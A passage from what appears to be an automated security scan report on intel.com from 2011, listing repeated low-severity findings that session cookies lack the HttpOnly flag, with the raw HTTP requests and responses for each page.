wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/environment/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=APMMGNPAKAIIPDFPNGEIOCDK; path=/


12.103. http://www.intel.com/intel/foundation/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/foundation/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation
Content-Length: 24
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:13 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=KPMMGNPAGBGBKNKDNKKIDJNM; path=/

iid=subhdr+cr_foundation

12.104. http://www.intel.com/intel/foundation/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/foundation/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/foundation/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/corporateresponsibility/foundation/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:12 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=AFDLKMPANJAOFEGACEBHHBGF; path=/


12.105. http://www.intel.com/intel/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /intel/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /intel/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/about/index.htm
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:07 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=MKMMGNPANGBLFGPHPJJOGEIO; path=/


12.106. http://www.intel.com/kr/business/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /kr/business/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kr/business/index.htm?iid=gg_ko_KR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/business?iid=gg_ko_KR+noscript
Content-Length: 21
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:18:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:18:43 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=NCMFCODAECIHHJFBMEHEGEOE; path=/

iid=gg_ko_KR+noscript

12.107. http://www.intel.com/newsroom/assets/images/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /newsroom/assets/images/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newsroom/assets/images/ HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:21:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:06 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=OAFLKMPAABHFKKFICLMGCMIN; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

12.108. http://www.intel.com/p/en_US/business/technology  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /p/en_US/business/technology

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/en_US/business/technology HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/business/technology/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwNDE6B8JG55AwMCur30o9Jz8pOA9oSDbMZvElgeB3A00PfzyM9N1S_IjagMDkhXBABpMSwF/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000b61jWhWIDSmDzsCh1APYcFV:13pbf30ea; Path=/
Content-Length: 42117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...

12.109. http://www.intel.com/pressroom/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /pressroom/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pressroom/index.htm?iid=gg_about+intel_pressroom HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom
Content-Length: 28
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:20:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:20:21 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=CNDLKMPAGDIJIBBEMEHCBBPH; path=/

iid=gg_about+intel_pressroom

12.110. http://www.intel.com/products/index.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /products/index.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Location: http://www.intel.com/p/en_US/products
Content-Length: 0
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 05 Feb 2011 23:19:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:19:23 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSACRDDSC=OIMFCODAEALLMGGILFOKNGOK; path=/


12.111. http://www.intel.com/sites/sitewide/survey/pix/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intel.com
Path:   /sites/sitewide/survey/pix/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/sitewide/survey/pix/ HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
